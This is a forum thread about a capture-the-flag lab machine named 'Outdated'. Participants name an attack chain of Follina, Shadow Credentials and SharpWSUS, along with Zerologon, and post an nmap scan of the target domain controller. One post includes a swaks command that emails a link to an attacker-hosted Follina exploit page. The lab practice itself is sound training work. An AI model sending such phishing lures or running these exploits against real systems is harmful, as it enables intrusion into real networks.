Return to forum

yepa · August 25, 2022 at 1:47 AM

:heart:

Exa · August 25, 2022 at 6:53 PM

I finally got root going the intended way. That is, Follina + Shadow Credentials + SharpWSUS.exe.

Overall, a nice machine; I learnt a few things. Thanks for all the hints.

JINXX · August 26, 2022 at 5:32 PM

(August 25, 2022, 06:53 PM)Exa Wrote: I finally got root going the intended way. That is, Follina + Shadow Credentials + SharpWSUS.exe.

Overall, a nice machine; I learnt a few things. Thanks for all the hints.

can you share your writeup kindly?

Cy6erf0x · August 27, 2022 at 2:34 PM

thanks

armada · August 27, 2022 at 8:54 PM

Guys can you explain how to get user? I created doc file using follina.py
then tried to send email but it couldn't find mail server
└─# swaks --to [email protected] --from meow@meow --server mail.outdated.htb --body "10.10.14.58:8080/exploit.html"
=== Trying mail.outdated.htb:25...
*** Error connecting to mail.outdated.htb:25:
*** IO::Socket::INET6: getaddrinfo: Name or service not known

(August 13, 2022, 08:54 PM)yumi Wrote: zerologon worked

rooted

Hey can you explain how to get user? I tried lots of way but nothing works

x19 · August 28, 2022 at 1:05 AM

I'm still working on it!!

ilost · August 28, 2022 at 1:49 AM

(August 13, 2022, 07:02 PM)wayxoo Wrote: Host is up (0.067s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T02:02:06+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T02:02:05+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T02:02:06+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m42s, deviation: 0s, median: 6h59m42s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-08-14T02:01:27
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.38 seconds

Danzigs · August 28, 2022 at 7:55 AM

cool post thanks

raptorx · August 28, 2022 at 9:25 AM

:angel:

inferno7us · August 28, 2022 at 11:08 AM

use follina exploit but doesn't work for me